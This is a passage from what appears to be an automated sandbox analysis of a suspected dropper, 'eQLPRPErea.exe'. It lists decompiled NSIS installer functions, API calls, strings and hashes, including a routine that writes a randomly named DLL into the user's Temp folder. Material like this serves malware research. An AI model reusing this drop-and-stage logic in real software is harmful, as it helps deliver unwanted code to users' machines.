						} while (_t88 != 0);
						__eflags =  *_t79;
						if( *_t79 != 0) {
							__eflags = _a8;
							if(_a8 != 0) {
								lstrcatA(_t79, _a8);
							}
						}
						goto L29;
					}
				}
				 *_t79 =  *_t79 & 0x00000000;
				if(_a4 == 0) {
					return _t35;
				}
				return E004059DB(_a4, _t35);
			}

0x00405a04
0x00405a0b
0x00405a0d
0x00405a1c
0x00405a1c
0x00405a26
0x00405a28
0x00405a2f
0x00405a37
0x00405a3d
0x00405a40
0x00405a40
0x00405bf1
0x00405bf1
0x00405bf5
0x00405bf8
0x00000000
0x00000000
0x00405a4d
0x00405a53
0x00000000
0x00000000
0x00405a59
0x00405a5a
0x00405a5d
0x00405be4
0x00405bee
0x00405bf0
0x00405bf0
0x00405be6
0x00405be8
0x00405bea
0x00405beb
0x00405beb
0x00000000
0x00405be4
0x00405a63
0x00405a67
0x00405a77
0x00405a7e
0x00405a81
0x00405a84
0x00405a86
0x00405a89
0x00405a8c
0x00405a8d
0x00405a91
0x00405a94
0x00405b8f
0x00405b93
0x00405bc3
0x00405bc7
0x00405bcc
0x00405bd0
0x00405bd0
0x00405bd5
0x00405bdb
0x00405bdd
0x00000000
0x00405bdd
0x00405b95
0x00405b98
0x00405bad
0x00405bb4
0x00405b9a
0x00405ba1
0x00405ba1
0x00405bbc
0x00405bbf
0x00405b87
0x00405b88
0x00405b88
0x00000000
0x00405bbf
0x00405a9a
0x00405a9e
0x00405aa3
0x00405aa4
0x00405aa7
0x00405ab2
0x00405ab5
0x00405ab8
0x00405ad1
0x00405ad4
0x00405b01
0x00405b04
0x00405b14
0x00405b17
0x00000000
0x00000000
0x00405b1f
0x00000000
0x00405b1f
0x00405b0c
0x00000000
0x00405b0c
0x00405ae6
0x00405aeb
0x00405aee
0x00000000
0x00000000
0x00405afa
0x00000000
0x00405aba
0x00405aca
0x00405b25
0x00405b25
0x00405b28
0x00000000
0x00000000
0x00000000
0x00405b28
0x00405aa9
0x00405aa9
0x00405b2a
0x00405b2a
0x00405b31
0x00405b35
0x00405b35
0x00405b36
0x00405b39
0x00405b45
0x00405b4b
0x00405b4d
0x00405b6c
0x00405b6c
0x00000000
0x00405b6c
0x00405b53
0x00405b5c
0x00405b5f
0x00405b64
0x00405b68
0x00000000
0x00000000
0x00405b6f
0x00405b6f
0x00405b6f
0x00405b73
0x00405b76
0x00405b78
0x00405b7c
0x00405b82
0x00405b82
0x00405b7c
0x00000000
0x00405b76
0x00405aa7
0x00405bfe
0x00405c08
0x00405c14
0x00405c14
0x00000000

APIs

SHGetSpecialFolderLocation.SHELL32(00404DB6,73BCEA30,00000006,0042A080,00000000,00404DB6,0042A080,00000000), ref: 00405B45
SHGetPathFromIDListA.SHELL32(73BCEA30,YVfgfgfgfgfg), ref: 00405B53
lstrcatA.KERNEL32(YVfgfgfgfgfg,00000000), ref: 00405B82
lstrlenA.KERNEL32(YVfgfgfgfgfg,00000006,0042A080,00000000,00404DB6,0042A080,00000000,00000000,0041A058,73BCEA30), ref: 00405BD6

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405AC0, 00405ADC
ProgramFilesDir, xrefs: 00405AD7
CommonFilesDir, xrefs: 00405ABB
C:\Program Files, xrefs: 00405AF4
m:X, xrefs: 00405A0D
YVfgfgfgfgfg, xrefs: 00405A28, 00405ABA, 00405AD6, 00405AF9, 00405B0B, 00405B1E, 00405B4F, 00405B81, 00405B87, 00405BA0, 00405BB3, 00405BCF, 00405BD5, 00405BDD, 00405C0A

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$YVfgfgfgfgfg$m:X
API String ID: 4227507514-4210870310
Opcode ID: 69eaa95762ce01c5e718d1e58068cedbee79facb795a7079d17d44c46ab99ceb
Instruction ID: 13347c9ab72858fb5eaf67a64ac525bbdc509f35e98fc7f159111bcae2296393
Opcode Fuzzy Hash: 69eaa95762ce01c5e718d1e58068cedbee79facb795a7079d17d44c46ab99ceb
Instruction Fuzzy Hash: 0B514471A04A40AADF206B648880B7F3BB4DB55324F24823BF951B92D2C77CB941DF5E

Uniqueness

Uniqueness Score: -1.00%

Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100
memoryfilestringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004026FA(void* __eflags) {
				void* _t23;
				void* _t28;
				long _t33;
				struct _OVERLAPPED* _t48;
				void* _t51;
				void* _t53;
				void* _t54;
				CHAR* _t55;
				void* _t58;
				void* _t59;
				void* _t60;

				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
				_t54 = E00402A9A(_t48);
				_t23 = E00405554(_t54);
				_push(_t54);
				if(_t23 == 0) {
					lstrcatA(E004054E8(E004059DB("C:\Users\jones\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll", "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
					_t55 = 0x40a040;
				} else {
					_push(0x40a040);
					E004059DB();
				}
				E00405C17(_t55);
				_t28 = E004056AC(_t55, 0x40000000, 2);
				 *(_t60 + 8) = _t28;
				if(_t28 != 0xffffffff) {
					_t33 =  *0x42f42c;
					 *(_t60 - 0x2c) = _t33;
					_t53 = GlobalAlloc(0x40, _t33);
					if(_t53 != _t48) {
						E0040311B(_t48);
						E004030E9(_t53,  *(_t60 - 0x2c));
						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
						 *(_t60 - 0x30) = _t58;
						if(_t58 != _t48) {
							E00402EBD( *((intOrPtr*)(_t60 - 0x20)), _t48, _t58,  *(_t60 - 0x1c));
							while( *_t58 != _t48) {
								_t59 = _t58 + 8;
								 *(_t60 - 0x38) =  *_t58;
								E0040568C( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
								_t58 = _t59 +  *(_t60 - 0x38);
							}
							GlobalFree( *(_t60 - 0x30));
						}
						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
						GlobalFree(_t53);
						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD(0xffffffff,  *(_t60 + 8), _t48, _t48);
					}
					CloseHandle( *(_t60 + 8));
					_t55 = 0x40a040;
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
					_t51 = 0xffffffef;
					DeleteFileA(_t55);
					 *((intOrPtr*)(_t60 - 4)) = 1;
				}
				_push(_t51);
				E00401428();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t60 - 4));
				return 0;
			}

0x004026fb
0x00402707
0x0040270a
0x00402711
0x00402712
0x00402737
0x0040273c
0x00402714
0x00402719
0x0040271a
0x0040271a
0x00402742
0x0040274f
0x00402757
0x0040275a
0x00402760
0x0040276e
0x00402773
0x00402777
0x0040277a
0x00402783
0x0040278f
0x00402793
0x00402796
0x004027a0
0x004027bf
0x004027ac
0x004027b4
0x004027b7
0x004027bc
0x004027bc
0x004027c6
0x004027c6
0x004027d8
0x004027df
0x004027f1
0x004027f1
0x004027f7
0x004027fd
0x004027fd
0x00402807
0x00402808
0x0040280c
0x0040280e
0x00402814
0x00402814
0x0040281b
0x004021e8
0x00402932
0x0040293e

APIs

lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
GlobalFree.KERNEL32 ref: 004027C6
WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
GlobalFree.KERNEL32 ref: 004027DF
CloseHandle.KERNEL32(?), ref: 004027F7
DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E

Part of subcall function 004059DB: lstrcpynA.KERNEL32(?,?,00000400,004031B8,arability Setup,NSIS Error), ref: 004059E8

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402721
C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll, xrefs: 00402714, 00402719, 00402726, 0040273C, 00402741, 0040274E, 004027FD, 0040280D

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll
API String ID: 3508600917-2811695148
Opcode ID: 7deaf60bf628365072dd8502dd0ead948c1abb9d8234e3140ea94df3bd8212ec
Instruction ID: e918ecff61003bd4e53df21424f32a66ffcc7178d15be7bffdb357a79f3add81
Opcode Fuzzy Hash: 7deaf60bf628365072dd8502dd0ead948c1abb9d8234e3140ea94df3bd8212ec
Instruction Fuzzy Hash: 9C31AEB1C00118BBDF116FA5CD89EAF7A69EF04324B20823AF914B72D1C77C5D419BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405C17, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C17(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405554(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405513("*?|<>/\":", _t5))) == 0) {
							E0040568C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405c19
0x00405c21
0x00405c35
0x00405c35
0x00405c3b
0x00405c48
0x00405c48
0x00405c49
0x00405c4b
0x00405c4f
0x00405c51
0x00405c5a
0x00405c5c
0x00405c76
0x00405c7e
0x00405c7e
0x00405c83
0x00405c85
0x00405c87
0x00405c8b
0x00405c8c
0x00405c8f
0x00405c97
0x00405c99
0x00405c9d
0x00000000
0x00000000
0x00405ca3
0x00405ca8
0x00000000
0x00000000
0x00000000
0x00405ca8
0x00405cad

APIs

CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C6F
CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C7C
CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C81
CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C91

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C17, 00405C18
*?|<>/":, xrefs: 00405C5F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C53

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 589700163-562438032
Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
Instruction ID: b197c2bef29f723973a647164ed9bfba67e7b184e87579fa7c6e082c99ea6b19
Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
Instruction Fuzzy Hash: B8118F9180DB952DFB3226284D44BBB6F89CB97760F18057BE8C4722C2C67C5C829B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E2A, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403E2A(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403e3c
0x00403ed0
0x00000000
0x00403ed0
0x00403e4d
0x00403e51
0x00000000
0x00000000
0x00403e57
0x00403e60
0x00403e63
0x00403e63
0x00403e69
0x00403e6f
0x00403e6f
0x00403e7b
0x00403e81
0x00403e88
0x00403e8b
0x00403e8e
0x00403e90
0x00403e90
0x00403e98
0x00403e9e
0x00403e9e
0x00403ea8
0x00403ead
0x00403eb0
0x00403eb5
0x00403eb8
0x00403eb8
0x00403ec8
0x00403ec8
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403E47
GetSysColor.USER32(00000000), ref: 00403E63
SetTextColor.GDI32(?,00000000), ref: 00403E6F
SetBkMode.GDI32(?,?), ref: 00403E7B
GetSysColor.USER32(?), ref: 00403E8E
SetBkColor.GDI32(?,?), ref: 00403E9E
DeleteObject.GDI32(?), ref: 00403EB8
CreateBrushIndirect.GDI32(?), ref: 00403EC2

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
Instruction ID: f5966fbedea87c62c799fd74794a37596286a0d285d836841829b5ba7487bb7a
Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
Instruction Fuzzy Hash: 2C215771904744ABC7219F78DD08B5B7FF8AF01715F048A69E855E26D0D738F904CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00404D7E, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404D7E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4092a0; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059FD(0, _t39, 0x42a080, 0x42a080, _a4);
					}
					_t26 = lstrlenA(0x42a080);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a080);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x42a080;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a080)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a080, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404d84
0x00404d90
0x00404d93
0x00404d99
0x00404da5
0x00404da8
0x00404dab
0x00404db1
0x00404db1
0x00404db7
0x00404dbf
0x00404dc2
0x00404ddf
0x00404de3
0x00404dec
0x00404dec
0x00404df6
0x00404dff
0x00404e0b
0x00404e12
0x00404e16
0x00404e19
0x00404e2c
0x00404e3a
0x00404e3a
0x00404e3e
0x00404e40
0x00404e43
0x00000000
0x00404e43
0x00404dc4
0x00404dcc
0x00404dd4
0x00404dda
0x00000000
0x00404dda
0x00404dd4
0x00404dc2
0x00404e4d

APIs

lstrlenA.KERNEL32(0042A080,00000000,0041A058,73BCEA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,73BCEA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,73BCEA30), ref: 00404DDA
SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E12
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E2C
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E3A

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 51f607469ab4337939dc402639e762edda63f0e7dd75a043e6aaa412e3dde4ad
Instruction ID: 9e4846259fdc63e4b0011bd9da19de3f15789c7d3b7aeff175938ec3064a1f56
Opcode Fuzzy Hash: 51f607469ab4337939dc402639e762edda63f0e7dd75a043e6aaa412e3dde4ad
Instruction Fuzzy Hash: B9218EB1900118BBDB119FA5CC84ADFBFA9EF44354F04807AFA04B6291C7398E40DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040166B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040166B() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A9A(0xffffffd0);
				 *(_t35 - 8) = E00402A9A(0xffffffdf);
				E004059DB(0x40a040,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x40a040, 0x40901c);
					lstrcatA(0x40a040,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405CB0( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						E00405723( *(_t35 + 8),  *(_t35 - 8));
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401428();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401674
0x00401684
0x00401688
0x00401690
0x004016a7
0x004016af
0x004016b8
0x004016b8
0x004016cb
0x004016d7
0x004026da
0x004016ed
0x004016f3
0x004016f8
0x00000000
0x004016f8
0x004016cd
0x004016cd
0x004021e8
0x004021e8
0x004021e8
0x00402932
0x0040293e

APIs

Part of subcall function 004059DB: lstrcpynA.KERNEL32(?,?,00000400,004031B8,arability Setup,NSIS Error), ref: 004059E8

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,?,000000DF,000000D0), ref: 00401690
lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,?,000000DF,000000D0), ref: 0040169A
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,?,000000DF,000000D0), ref: 004016AF
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,?,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,?,000000DF,000000D0), ref: 004016B8

Part of subcall function 00405CB0: SetErrorMode.KERNELBASE(00008001,00000000,0042BCA8,C:\Users\user\AppData\Local\Temp\,0040560B,0042BCA8,0042BCA8,00000000,0042BCA8,0042BCA8,?,?,00000000,00405331,?,"C:\Users\user\Desktop\eQLPRPErea.exe" ), ref: 00405CBE
Part of subcall function 00405CB0: FindFirstFileA.KERNELBASE(?,0042C8F0), ref: 00405CCA
Part of subcall function 00405CB0: SetErrorMode.KERNELBASE(00000000), ref: 00405CD4
Part of subcall function 00405CB0: FindClose.KERNELBASE(00000000), ref: 00405CDC

Part of subcall function 00405723: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054D8,?,00000000,000000F1,?), ref: 00405778
Part of subcall function 00405723: GetShortPathNameA.KERNEL32(?,0042CA30,00000400), ref: 00405781
Part of subcall function 00405723: GetShortPathNameA.KERNEL32(00000000,0042C4A8,00000400), ref: 0040579E
Part of subcall function 00405723: wsprintfA.USER32 ref: 004057BC
Part of subcall function 00405723: GetWindowsDirectoryA.KERNEL32(0042C4A8,000003F0,?,?,00000000,000000F1,?), ref: 004057CD
Part of subcall function 00405723: lstrcatA.KERNEL32(0042C4A8,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D9
Part of subcall function 00405723: CreateFileA.KERNEL32(0042C4A8,C0000000,00000000,00000000,00000004,08000080,00000000,0042C4A8,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057F0
Part of subcall function 00405723: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 00405804
Part of subcall function 00405723: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405813
Part of subcall function 00405723: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405829

MoveFileA.KERNEL32(?,?), ref: 004016C3

Strings

C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll, xrefs: 0040167F, 004016AE, 004016B7

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
String ID: C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll
API String ID: 2621199633-3992320418
Opcode ID: 39be9a3ed13df2c1dc0a7def94e95ebcbb8ca7a0b25094b5a643ed618163fea6
Instruction ID: 9f433403dff5527e04f0e9ab7737a20a855248c0a7a5ae3549be26796f1196a1
Opcode Fuzzy Hash: 39be9a3ed13df2c1dc0a7def94e95ebcbb8ca7a0b25094b5a643ed618163fea6
Instruction Fuzzy Hash: 5A117072904215FBCF016FA2CD4999E7A61EF103A8F10423BF501751E1DA7D8A91AF9E

Uniqueness

Uniqueness Score: -1.00%

Function 00404643, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404643(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
